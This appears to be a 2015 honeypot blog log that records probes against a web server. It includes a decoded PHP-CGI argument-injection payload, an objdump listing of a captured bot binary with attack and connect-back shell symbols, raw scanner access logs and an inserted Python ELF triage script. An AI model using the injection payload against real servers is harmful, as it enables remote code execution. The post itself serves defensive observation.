2015-03-05: Here are the results of running a random, unpublicized webserver at a major virtual hoster site from 2015-03-03 through 2015-03-05. So far, it looks like we have had two probes: one is for home router vulnerabilities via tmUnblock.cgi, and the other seems to be looking for Drupal misconfiguration.

2015-03-19: There has certainly been quite a pickup in activity over the last two weeks. There was a fairly generic probe from 54.147.26.255 on March 8; when decoded, it goes something like:

-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n

There's quite an interesting small probe from 146.0.32.3 on March 11: 0x16 0x03 0x01; apparently someone is trying SSL against our port 80 server. It is repeated again on March 13 from the same machine. On March 14, we have a flurry of probes from 204.110.9.197, looking for a large number of vulnerabilities. Also, we see another flurry of similar probes from 93.158.200.34 and then from 198.50.232.79 (the latter are looking for phpMyAdmin vulnerabilities). Later on the 14th, we see 54.164.156.8 making some rather interesting attempts to find vulnerabilities which, if successful, run a script that then tries to pull in further exploit scripts (ou.pl). On the 16th, we see 222.66.95.253 attempt a download attack as well.
This one is considerably more advanced; it's a statically linked i386 ELF binary that has some pretty interesting bits:

ntldont:     file format elf32-i386
ntldont
architecture: i386, flags 0x00000112:
EXEC_P, HAS_SYMS, D_PAGED
start address 0x080480e0

Program Header:
    LOAD off    0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
         filesz 0x00125cb4 memsz 0x00125cb4 flags r-x
    LOAD off    0x00126000 vaddr 0x0816e000 paddr 0x0816e000 align 2**12
         filesz 0x00006be8 memsz 0x0004cf54 flags rw-
    NOTE off    0x00000094 vaddr 0x08048094 paddr 0x08048094 align 2**2
         filesz 0x00000020 memsz 0x00000020 flags r--

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  0 .init         00000017  080480b4  080480b4  000000b4  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
  1 .text         000ec101  080480e0  080480e0  000000e0  2**5
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
  2 __libc_freeres_fn 0000063e  081341e4  081341e4  000ec1e4  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
  3 __libc_thread_freeres_fn 000000e1  08134824  08134824  000ec824  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
  4 .fini         0000001b  08134908  08134908  000ec908  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
  5 .rodata       00018dbe  08134940  08134940  000ec940  2**5
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  6 __libc_subfreeres 00000034  0814d700  0814d700  00105700  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  7 __libc_atexit 00000004  0814d734  0814d734  00105734  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  8 __libc_thread_subfreeres 00000004  0814d738  0814d738  00105738  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  9 .eh_frame     0001a4fc  0814d73c  0814d73c  0010573c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 10 .gcc_except_table 0000607c  08167c38  08167c38  0011fc38  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 11 .data         00006b48  0816e000  0816e000  00126000  2**5
                  CONTENTS, ALLOC, LOAD, DATA
 12 .ctors        00000040  08174b48  08174b48  0012cb48  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 13 .dtors        00000008  08174b88  08174b88  0012cb88  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 14 .jcr          00000004  08174b90  08174b90  0012cb90  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 15 .got          00000054  08174b94  08174b94  0012cb94  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 16 .bss          00046340  08174c00  08174c00  0012cc00  2**5
                  ALLOC
 17 __libc_freeres_ptrs 00000014  081baf40  081baf40  0012cc00  2**2
                  ALLOC
 18 .comment      000012ba  00000000  00000000  0012cc00  2**0
                  CONTENTS, READONLY
 19 .debug_aranges 00000078  00000000  00000000  0012dec0  2**3
                  CONTENTS, READONLY, DEBUGGING
 20 .debug_pubnames 00000025  00000000  00000000  0012df38  2**0
                  CONTENTS, READONLY, DEBUGGING
 21 .debug_info   00000a84  00000000  00000000  0012df5d  2**0
                  CONTENTS, READONLY, DEBUGGING
 22 .debug_abbrev 00000138  00000000  00000000  0012e9e1  2**0
                  CONTENTS, READONLY, DEBUGGING
 23 .debug_line   0000027c  00000000  00000000  0012eb19  2**0
                  CONTENTS, READONLY, DEBUGGING
 24 .debug_frame  00000014  00000000  00000000  0012ed98  2**2
                  CONTENTS, READONLY, DEBUGGING
 25 .debug_str    000006ba  00000000  00000000  0012edac  2**0
                  CONTENTS, READONLY, DEBUGGING
 26 .note.ABI-tag 00000020  08048094  08048094  00000094  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
SYMBOL TABLE:
080480b4 l    d  .init                     00000000 .init
080480e0 l    d  .text                     00000000 .text
081341e4 l    d  __libc_freeres_fn         00000000 __libc_freeres_fn
08134824 l    d  __libc_thread_freeres_fn  00000000 __libc_thread_freeres_fn
08134908 l    d  .fini                     00000000 .fini
08134940 l    d  .rodata                   00000000 .rodata
0814d700 l    d  __libc_subfreeres         00000000 __libc_subfreeres
0814d734 l    d  __libc_atexit             00000000 __libc_atexit
0814d738 l    d  __libc_thread_subfreeres  00000000 __libc_thread_subfreeres
0814d73c l    d  .eh_frame                 00000000 .eh_frame
08167c38 l    d  .gcc_except_table         00000000 .gcc_except_table
0816e000 l    d  .data                     00000000 .data
08174b48 l    d  .ctors                    00000000 .ctors
08174b88 l    d  .dtors                    00000000 .dtors
08174b90 l    d  .jcr                      00000000 .jcr
08174b94 l    d  .got                      00000000 .got
08174c00 l    d  .bss                      00000000 .bss
081baf40 l    d  __libc_freeres_ptrs       00000000 __libc_freeres_ptrs
00000000 l    d  .comment                  00000000 .comment
00000000 l    d  .debug_aranges            00000000 .debug_aranges
00000000 l    d  .debug_pubnames           00000000 .debug_pubnames
00000000 l    d  .debug_info               00000000 .debug_info
00000000 l d .debug_abbrev 00000000 .debug_abbrev 00000000 l d .debug_line 00000000 .debug_line 00000000 l d .debug_frame 00000000 .debug_frame 00000000 l d .debug_str 00000000 .debug_str 08048094 l d .note.ABI-tag 00000000 .note.ABI-tag 00000000 l d *ABS* 00000000 .shstrtab 00000000 l d *ABS* 00000000 .symtab 00000000 l d *ABS* 00000000 .strtab 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/csu/crti.S 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/csu/defs.h 00000000 l df *ABS* 00000000 initfini.c 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/csu/crti.S 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/config.h 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/csu/crti.S 08048104 l F .text 00000000 call_gmon_start 00000000 l df *ABS* 00000000 crtstuff.c 08174b48 l O .ctors 00000000 __CTOR_LIST__ 08174b88 l O .dtors 00000000 __DTOR_LIST__ 0814d73c l O .eh_frame 00000000 __EH_FRAME_BEGIN__ 08174b90 l O .jcr 00000000 __JCR_LIST__ 0816e008 l O .data 00000000 p.0 08174c00 l O .bss 00000001 completed.1 08048128 l F .text 00000000 __do_global_dtors_aux 08174c04 l O .bss 00000018 object.2 0804817c l F .text 00000000 frame_dummy 00000000 l df *ABS* 00000000 crtstuff.c 08174b84 l O .ctors 00000000 __CTOR_END__ 08174b8c l O .dtors 00000000 __DTOR_END__ 08167c34 l O .eh_frame 00000000 __FRAME_END__ 08174b90 l O .jcr 00000000 __JCR_END__ 0813401c l F .text 00000000 __do_global_ctors_aux 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/csu/crtn.S 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/csu/defs.h 00000000 l df *ABS* 00000000 
initfini.c 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/csu/crtn.S 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/config.h 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/csu/crtn.S 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/config.h 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 abi-note.S 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/csu/abi-tag.h 00000000 l df *ABS* 00000000 abi-note.S 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/config.h 00000000 l df *ABS* 00000000 abi-note.S 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/config.h 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 abi-note.S 00000000 l df *ABS* 00000000 init.c 00000000 l df *ABS* 00000000 AmpResource.cpp 080483ee l F .text 0000003e _Z41__static_initialization_and_destruction_0ii 0804842c l F .text 00000018 __tcf_0 08048444 l F .text 0000001a _GLOBAL__I_g_AmpResource 00000000 l df *ABS* 00000000 Attack.cpp 00000000 l df *ABS* 00000000 CmdMsg.cpp 00000000 l df *ABS* 00000000 ConfigDoing.cpp 080509d0 l F .text 00000074 _Z41__static_initialization_and_destruction_0ii 08050a44 l F .text 00000018 __tcf_0 08050a5c l F .text 00000018 __tcf_1 08050a74 l F .text 0000001a _GLOBAL__I_g_cnfgDoing 00000000 l df *ABS* 00000000 DNSCache.cpp 080526f8 l F .text 0000003e _Z41__static_initialization_and_destruction_0ii 08052736 l F .text 00000018 __tcf_0 0805274e l F .text 0000001a _GLOBAL__I_g_dnsCache 00000000 l df *ABS* 
00000000 ExChange.cpp 0816e404 l O .data 00000004 _ZN13FetcherStorer16sm_nMaxStringLenE 00000000 l df *ABS* 00000000 Global.cpp 0805c5b4 l F .text 000002f6 _Z41__static_initialization_and_destruction_0ii 0805c8aa l F .text 00000018 __tcf_0 0805c8c2 l F .text 00000018 __tcf_1 0805c8da l F .text 00000018 __tcf_2 0805c8f2 l F .text 00000018 __tcf_3 0805c90a l F .text 00000018 __tcf_4 0805c922 l F .text 00000018 __tcf_5 0805c93a l F .text 00000018 __tcf_6 0805c952 l F .text 00000018 __tcf_7 0805c96a l F .text 00000018 __tcf_8 0805c982 l F .text 00000018 __tcf_9 0805c99a l F .text 00000018 __tcf_10 0805c9b2 l F .text 0000001a _GLOBAL__I_g_iBeikongLock 00000000 l df *ABS* 00000000 Main.cpp 00000000 l df *ABS* 00000000 Manager.cpp 0816e688 l O .data 00000004 _ZN13FetcherStorer16sm_nMaxStringLenE 00000000 l df *ABS* 00000000 MiniHttpHelper.cpp 00000000 l df *ABS* 00000000 ProtocolUtil.cpp 00000000 l df *ABS* 00000000 ProvinceDns.cpp 0816e740 l O .data 00000004 g_iProvinceDns 0816e760 l O .data 0000052c g_sProvinceDns 0806ce64 l F .text 0000003e _Z41__static_initialization_and_destruction_0ii 0806cea2 l F .text 00000018 __tcf_0 0806ceba l F .text 0000001a _GLOBAL__I_g_provinceDns 00000000 l df *ABS* 00000000 StatBase.cpp 0806e944 l F .text 0000003e _Z41__static_initialization_and_destruction_0ii 0806e982 l F .text 00000018 __tcf_0 0806e99a l F .text 0000001a _GLOBAL__I_g_statBase 00000000 l df *ABS* 00000000 SysTool.cpp 0816eca0 l O .data 00000004 uaSystoolNum 0816ecc0 l O .data 00000030 uaSystools 00000000 l df *ABS* 00000000 ThreadAtk.cpp 00000000 l df *ABS* 00000000 ThreadClientStatus.cpp 00000000 l df *ABS* 00000000 ThreadConnection.cpp 00000000 l df *ABS* 00000000 ThreadDoFun.cpp 0816ede0 l O .data 00000040 PADDING 00000000 l df *ABS* 00000000 ThreadFakeDetect.cpp 00000000 l df *ABS* 00000000 ThreadHttpGet.cpp 00000000 l df *ABS* 00000000 ThreadKillChaos.cpp 00000000 l df *ABS* 00000000 ThreadLoopCmd.cpp 00000000 l df *ABS* 00000000 ThreadMonGates.cpp 00000000 l df 
*ABS* 00000000 ThreadRecycle.cpp 00000000 l df *ABS* 00000000 ThreadShell.cpp 08080ddc l F .text 00000026 _Z7hangouti 08080e02 l F .text 000000e1 _Z9ptym_openPc 08080ee4 l F .text 000000ad _Z9ptys_openiPc 08080f92 l F .text 0000005c _Z8open_ttyRiS_ 080810a6 l F .text 000005b4 _Z11connectbackPKct 00000000 l df *ABS* 00000000 ThreadShellRecycle.cpp 00000000 l df *ABS* 00000000 ThreadTask.cpp 00000000 l df *ABS* 00000000 ThreadTns.cpp 00000000 l df *ABS* 00000000 ThreadUpdate.cpp 00000000 l df *ABS* 00000000 UserAgent.cpp 080832d4 l F .text 0000003e _Z41__static_initialization_and_destruction_0ii 08083312 l F .text 00000018 __tcf_0 0808332a l F .text 0000001a _GLOBAL__I_g_uaGlobal 00000000 l df *ABS* 00000000 AutoLock.cpp 00000000 l df *ABS* 00000000 FileOp.cpp 00000000 l df *ABS* 00000000 Ijduy.cpp 00000000 l df *ABS* 00000000 Iysd76.cpp 081370e0 l O .rodata 00000898 PrimeTable 00000000 l df *ABS* 00000000 Log.cpp 00000000 l df *ABS* 00000000 Md5.cpp 0816efa0 l O .data 00000040 PADDING 00000000 l df *ABS* 00000000 Media.cpp 0816eff8 l O .data 00000004 _ZN13FetcherStorer16sm_nMaxStringLenE 00000000 l df *ABS* 00000000 NetBase.cpp 00000000 l df *ABS* 00000000 ThreadCondition.cpp 00000000 l df *ABS* 00000000 Thread.cpp 00000000 l df *ABS* 00000000 ThreadMutex.cpp 00000000 l df *ABS* 00000000 Utility.cpp 0816f040 l O .data 00000040 PADDING 08089a00 l F .text 00000074 _Z41__static_initialization_and_destruction_0ii 08089a74 l F .text 00000018 __tcf_0 08089a8c l F .text 00000018 __tcf_1 08089aa4 l F .text 0000001a _GLOBAL__I__ZN8CUtility13sm_strBinPathE 00000000 l df *ABS* 00000000 WinDefSVC.cpp 08134040 l O .text 00000052 __evoke_link_warning_pthread_attr_setstackaddr 081340a0 l O .text 00000052 __evoke_link_warning_pthread_attr_getstackaddr 0808a854 l F .text 000000a7 cond_extricate_func 0808a8fc l F .text 000002c1 pthread_cond_timedwait_relative 0808b4b0 l F .text 00000084 join_extricate_func 08174e48 l O .bss 00000004 manager_thread 08174e4c l O .bss 00000004 
terminated_children 0808bb50 l F .text 000001c8 pthread_reap_children 0808b784 l F .text 000003ca pthread_handle_create 0808bd18 l F .text 00000116 pthread_handle_free 08174e50 l O .bss 00000004 main_thread_exiting 0808be88 l F .text 00000045 pthread_for_each_thread 0808be30 l F .text 00000058 pthread_kill_all_threads 0808bed0 l F .text 00000080 pthread_handle_exit 0808c244 l F .text 00000137 pthread_allocate_stack 08174e54 l O .bss 00000004 pthread_threads_counter 0808c03c l F .text 000000f3 pthread_start_thread 0808c130 l F .text 00000113 pthread_start_thread_event 0816f0a0 l O .data 00000018 once_masterlock 0816f0c0 l O .data 00000030 once_finished 0816f0f0 l O .data 00000004 fork_generation 0808cc60 l F .text 00000039 pthread_once_cancelhandler 08137ab8 l O .rodata 00000008 sysctl_args.0 08174e58 l O .bss 00000004 __libc_multiple_threads_ptr 0808dc94 l F .text 0000006a pthread_handle_sigrestart 0808dba0 l F .text 000000f4 pthread_handle_sigcancel 0808dd00 l F .text 00000005 pthread_handle_sigdebug 0808daac l F .text 000000f1 pthread_onexit_process 0808dd08 l F .text 0000021e pthread_initialize 08174e5c l O .bss 00000004 current_level 0816fb20 l O .data 00002000 pthread_keys 08171b20 l O .data 00000018 pthread_keys_mutex 0808e8dc l F .text 000000a7 pthread_key_delete_helper 0808f1e4 l F .text 000000a7 new_sem_extricate_func 0808fa2c l F .text 0000005c __pthread_acquire 08174e64 l O .bss 00000004 wait_node_free_list_spinlock 08174e60 l O .bss 00000004 wait_node_free_list 0808fddc l F .text 0000021b do_fcntl 08137b78 l O .rodata 00000004 _ZZ18__gthread_active_pvE20__gthread_active_ptr 08137b80 l O .rodata 00000083 _ZZNSt24__default_alloc_templateILb1ELi0EE8allocateEjE19__PRETTY_FUNCTION__ 08137dc4 l O .rodata 00000004 _ZZ18__gthread_active_pvE20__gthread_active_ptr 08174ee0 l O .bss 00004000 emergency_buffer 08178ee0 l O .bss 00000004 emergency_used 08171c84 l O .data 00000018 emergency_mutex 08171c9c l O .data 00000004 
_ZZ18__gthread_active_pvE20__gthread_active_ptr 08178ee4 l O .bss 00000008 globals_static 08178eec l O .bss 00000004 globals_key 08171ce8 l O .data 00000004 use_thread_key 08095880 l F .text 00000046 _Z16get_globals_dtorPv 080958d0 l F .text 00000041 _Z16get_globals_initv 08171cec l O .data 00000004 _ZZ21get_globals_init_oncevE4once 08171cf0 l O .data 00000004 _ZZ18__gthread_active_pvE20__gthread_active_ptr 08095920 l F .text 0000005c _Z21get_globals_init_oncev 08095a60 l F .text 0000005a _Z21size_of_encoded_valueh 08095ac0 l F .text 0000008a _Z21base_of_encoded_valuehP15_Unwind_Context 08095b50 l F .text 00000038 _Z12read_uleb128PKhPj 08095b90 l F .text 0000004f _Z12read_sleb128PKhPi 08095be0 l F .text 000000dd _Z28read_encoded_value_with_basehjPKhPj 08095cc0 l F .text 000000e7 _Z17parse_lsda_headerP15_Unwind_ContextPKhP16lsda_header_info 08095db0 l F .text 00000051 _Z15get_ttype_entryP16lsda_header_infoj 08095e10 l F .text 00000068 _Z16get_adjusted_ptrPKSt9type_infoS1_PPv 08095e80 l F .text 0000006c _Z20check_exception_specP16lsda_header_infoPKSt9type_infoPvi 08095ca2 l .text 00000000 .L48 08095c26 l .text 00000000 .L42 08095c77 l .text 00000000 .L44 08095ca9 l .text 00000000 .L49 08095c80 l .text 00000000 .L50 08095c87 l .text 00000000 .L43 08095c9d l .text 00000000 .L47 080965d0 l F .text 00000055 _Z23__gxx_exception_cleanup19_Unwind_Reason_CodeP17_Unwind_Exception 08171e4c l O .data 00000004 _ZZNSt8ios_base6xallocEvE6_S_top 080b6a50 l F .text 0000056a _Z41__static_initialization_and_destruction_0ii 080b71e0 l F .text 0000001e _GLOBAL__I__ZNSt21__ctype_abstract_baseIcED0Ev.._.._.._.._libstdc___v3_src_locale_inst.ccBN9dib 08138f58 l O .rodata 00000004 _ZZ18__gthread_active_pvE20__gthread_active_ptr 080c69d0 l F .text 00000048 _Z41__static_initialization_and_destruction_0ii 080c6a20 l F .text 0000001e _GLOBAL__I__ZNSt7codecvtIcc11__mbstate_tE2idE 080c7220 l F .text 00000048 _Z41__static_initialization_and_destruction_0ii 080c7270 l F .text 0000001e 
_GLOBAL__I__ZNSt5ctypeIcE13classic_tableEv
0817904c l     O .bss   00000001 _ZSt8__ioinit
080c7ef0 l     F .text  00000043 _Z41__static_initialization_and_destruction_0ii
080c7f40 l     F .text  00000010 __tcf_0
080c7f50 l     F .text  0000001e _GLOBAL__I__ZN9__gnu_cxx13stdio_filebufIwSt11char_traitsIwEE2fdEv.._.._.._.._libstdc___v3_src_ext_inst.cc8hFDhb
08179df0 l     O .bss   00000001 _ZSt8__ioinit
080ce080 l     F .text  00000043 _Z41__static_initialization_and_destruction_0ii
080ce0d0 l     F .text  00000010 __tcf_0
080ce0e0 l     F .text  0000001e _GLOBAL__I__ZThn8_NSt14basic_iostreamIwSt11char_traitsIwEED0Ev.._.._.._.._libstdc___v3_src_io_inst.ccm1Emhb
080ced34 l     F .text  0000020e __udivmoddi4
080cef68 l     F .text  0000020e __udivmoddi4
080cf178 l     F .text  00000055 size_of_encoded_value
080cf1d0 l     F .text  0000007c base_of_encoded_value
080cf24c l     F .text  00000033 read_uleb128
080cf280 l     F .text  0000004a read_sleb128
080cf2cc l     F .text  000000c6 read_encoded_value_with_base
080cf3c4 l     F .text  00000152 extract_cie_info
080cf518 l     F .text  00000441 execute_stack_op
080cf95c l     F .text  000004e0 execute_cfa_program
080cfe3c l     F .text  0000024d uw_frame_state_for
080d01d0 l     F .text  00000137 uw_update_context_1
080d0308 l     F .text  0000002e uw_update_context
080d0338 l     F .text  00000079 uw_init_context_1
08173a30 l     O .data  00000004 once_regsizes.0
08173a34 l     O .data  00000004 __gthread_active_ptr.1
080d03b4 l     F .text  00000107 uw_install_context_1
08179df4 l     O .bss   00000011 dwarf_reg_size_table
080d097c l     F .text  0000007e init_dwarf_reg_size_table
080d04bc l     F .text  000000b2 _Unwind_RaiseException_Phase2
080d06c4 l     F .text  000000ea _Unwind_ForcedUnwind_Phase2

Then on March 17th, we see two similar attacks, but unfortunately the attacker has stripped these binaries and UPX-packed them. While there is no debugging information in either of these, udso has not been stripped, so we can still extract a namelist, which, among other things, shows that gmon profiling data is apparently being collected.
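As an added example (not code from this page and not the captured sample), here is a small Python triage routine for an ELF32 image like the one listed above. It parses the ELF header and PT_LOAD program headers, checks that the entry point falls inside an executable segment, reports any segment that is both writable and executable, looks for the "UPX!" marker that UPX leaves in the files it packs (a packer can of course erase it, so its absence proves nothing), and greps the image for a few of the tell-tale names from the listing (connectback, ptym_open, ThreadAtk, ThreadShell, Attack.cpp). The bytes it runs on are constructed inside the block to mirror the listing's numbers (entry 0x080480e0, r-x text at 0x08048000, rw- data at 0x0816e000); the string blob with two mangled names is likewise invented stand-in data.

```python
import struct

ELF_MAGIC = b"\x7fELF"
PT_LOAD = 1
PF_X, PF_W, PF_R = 1, 2, 4
ET_EXEC, EM_386 = 2, 3

# Name fragments taken from the objdump listing above; finding them in an
# unknown sample is a cheap first-pass indicator, nothing more.
SUSPICIOUS_NAMES = ("connectback", "ptym_open", "ThreadAtk", "ThreadShell", "Attack.cpp")


def build_sample_elf32(upx_marker=False):
    """Constructed ELF32 image: header + two PT_LOAD entries + a fake string
    blob. Numbers mirror the listing above; this is NOT the captured binary."""
    e_phoff, e_phnum = 52, 2
    ehdr = struct.pack(
        "<4sBBBBB7xHHIIIIIHHHHHH",
        ELF_MAGIC, 1, 1, 1, 0, 0,        # ELFCLASS32, ELFDATA2LSB, EV_CURRENT, OSABI, ABI ver
        ET_EXEC, EM_386, 1,              # e_type, e_machine, e_version
        0x080480E0,                      # e_entry (start address in the listing)
        e_phoff, 0, 0,                   # e_phoff, e_shoff, e_flags
        52, 32, e_phnum,                 # e_ehsize, e_phentsize, e_phnum
        0, 0, 0)                         # e_shentsize, e_shnum, e_shstrndx
    phdrs = struct.pack("<8I", PT_LOAD, 0x00000000, 0x08048000, 0x08048000,
                        0x00125CB4, 0x00125CB4, PF_R | PF_X, 0x1000)
    phdrs += struct.pack("<8I", PT_LOAD, 0x00126000, 0x0816E000, 0x0816E000,
                         0x00006BE8, 0x0004CF54, PF_R | PF_W, 0x1000)
    strtab = b"\0_Z11connectbackPKct\0_Z9ptym_openPc\0"   # invented stand-in strtab
    return ehdr + phdrs + strtab + (b"UPX!" if upx_marker else b"")


def parse_elf32(data):
    """Return type, machine, entry point and the PT_LOAD segments of a
    little-endian ELF32 image."""
    if data[:4] != ELF_MAGIC or data[4] != 1 or data[5] != 1:
        raise ValueError("not a little-endian ELF32 image")
    (e_type, e_machine, _ver, e_entry, e_phoff, _shoff, _flags,
     _ehsize, e_phentsize, e_phnum) = struct.unpack_from("<HHIIIIIHHH", data, 16)
    segments = []
    for i in range(e_phnum):
        (p_type, p_off, p_vaddr, _p_paddr, p_filesz, p_memsz,
         p_flags, _p_align) = struct.unpack_from("<8I", data, e_phoff + i * e_phentsize)
        if p_type != PT_LOAD:
            continue
        flags = "".join(ch if p_flags & bit else "-"
                        for bit, ch in ((PF_R, "r"), (PF_W, "w"), (PF_X, "x")))
        segments.append({"offset": p_off, "vaddr": p_vaddr, "filesz": p_filesz,
                         "memsz": p_memsz, "flags": flags})
    return {"type": e_type, "machine": e_machine, "entry": e_entry, "segments": segments}


def triage(data):
    """Parse the image and return (info, findings) for a first look."""
    info = parse_elf32(data)
    findings = []
    entry = info["entry"]
    # The entry point should land in an executable PT_LOAD segment.
    if not any(s["flags"].endswith("x") and s["vaddr"] <= entry < s["vaddr"] + s["memsz"]
               for s in info["segments"]):
        findings.append("entry point 0x%08x is outside every executable segment" % entry)
    for s in info["segments"]:
        if s["flags"] == "rwx":
            findings.append("writable and executable segment at 0x%08x" % s["vaddr"])
    if b"UPX!" in data:
        findings.append("UPX! marker present: unpack before reading symbols")
    hits = [n for n in SUSPICIOUS_NAMES if n.encode() in data]
    if hits:
        findings.append("suspicious names: " + ", ".join(hits))
    return info, findings


if __name__ == "__main__":
    info, findings = triage(build_sample_elf32(upx_marker=True))
    print("entry 0x%08x, %d PT_LOAD segments" % (info["entry"], len(info["segments"])))
    for s in info["segments"]:
        print("  %s vaddr 0x%08x filesz 0x%06x memsz 0x%06x"
              % (s["flags"], s["vaddr"], s["filesz"], s["memsz"]))
    for f in findings:
        print("  !", f)
```

The memsz/filesz gap on the second segment (0x0004cf54 versus 0x00006be8) is just the .bss, so it is not reported; a real triage pass would next walk the section headers and symbol table, which the sample image omits.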
2015-03-31: It seems to have become quieter; the logs don't show any new attacks or anomalous entries.

==> access.log <==
188.138.17.205 - - [03/Mar/2015:18:39:36 +0000] "GET / HTTP/1.1" 200 460 "-" "-"
188.138.17.205 - - [03/Mar/2015:18:39:36 +0000] "GET /robots.txt HTTP/1.1" 404 470 "-" "-"
188.138.17.205 - - [03/Mar/2015:18:40:11 +0000] "GET / HTTP/1.1" 200 460 "-" "-"
188.138.17.205 - - [03/Mar/2015:18:40:11 +0000] "GET /robots.txt HTTP/1.1" 404 470 "-" "-"
128.61.240.66 - - [04/Mar/2015:05:08:46 +0000] "GET / HTTP/1.0" 200 453 "-" "netscan.gtisc.gatech.edu"
23.20.55.147 - - [04/Mar/2015:07:21:29 +0000] "HEAD / HTTP/1.1" 200 283 "-" "Cloud mapping experiment. Contact research@pdrlabs.net"
188.138.17.205 - - [04/Mar/2015:07:23:17 +0000] "GET / HTTP/1.1" 200 460 "-" "-"
188.138.17.205 - - [04/Mar/2015:07:23:18 +0000] "GET /robots.txt HTTP/1.1" 404 470 "-" "-"
118.98.104.21 - - [04/Mar/2015:07:57:05 +0000] "GET /user/soapCaller.bs HTTP/1.1" 404 471 "-" "Morfeus [redacted] Scanner"
206.82.85.41 - - [04/Mar/2015:10:43:20 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 525 "-" "-"
115.159.63.139 - - [04/Mar/2015:11:19:35 +0000] "GET http://www.mafengwo.com/ HTTP/1.1" 200 446 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
54.146.28.237 - - [04/Mar/2015:18:36:32 +0000] "GET / HTTP/1.1" 200 453 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
182.118.55.249 - - [04/Mar/2015:21:26:59 +0000] "GET / HTTP/1.1" 200 427 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2251.0 Safari/537.36"
94.102.49.168 - - [05/Mar/2015:01:53:45 +0000] "GET / HTTP/1.1" 200 460 "-" "-"
128.61.240.66 - - [05/Mar/2015:13:10:03 +0000] "GET / HTTP/1.0" 200 453 "-" "netscan.gtisc.gatech.edu"
61.240.144.66 - - [05/Mar/2015:16:40:26 +0000] "GET / HTTP/1.0" 200 453 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
222.186.21.70 - - [05/Mar/2015:20:32:47 +0000] "GET https://www.baidu.com/ HTTP/1.1" 200 427 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0"
58.213.132.149 - - [06/Mar/2015:06:09:01 +0000] "GET / HTTP/1.0" 200 453 "-" "-"
58.213.132.149 - - [06/Mar/2015:06:09:02 +0000] "HEAD / HTTP/1.1" 200 276 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
58.213.132.149 - - [06/Mar/2015:06:09:02 +0000] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
128.61.240.66 - - [06/Mar/2015:10:18:17 +0000] "GET / HTTP/1.0" 200 453 "-" "netscan.gtisc.gatech.edu"
54.144.23.48 - - [06/Mar/2015:11:46:40 +0000] "HEAD / HTTP/1.1" 200 283 "-" "Cloud mapping experiment. Contact research@pdrlabs.net"
192.187.110.98 - - [06/Mar/2015:15:05:02 +0000] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 404 450 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
61.240.144.66 - - [06/Mar/2015:18:52:45 +0000] "GET / HTTP/1.0" 200 453 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
